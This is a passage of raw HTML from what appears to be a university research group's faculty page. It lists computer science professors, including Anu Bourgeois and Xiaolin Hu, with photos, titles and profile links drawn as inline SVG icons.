8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-bourgeois-e1697143389924.jpeg\" class=\"wp-image-1675 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/cropped-cropped-hu_new-1-e1697143455517.jpg\" class=\"wp-image-1677 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 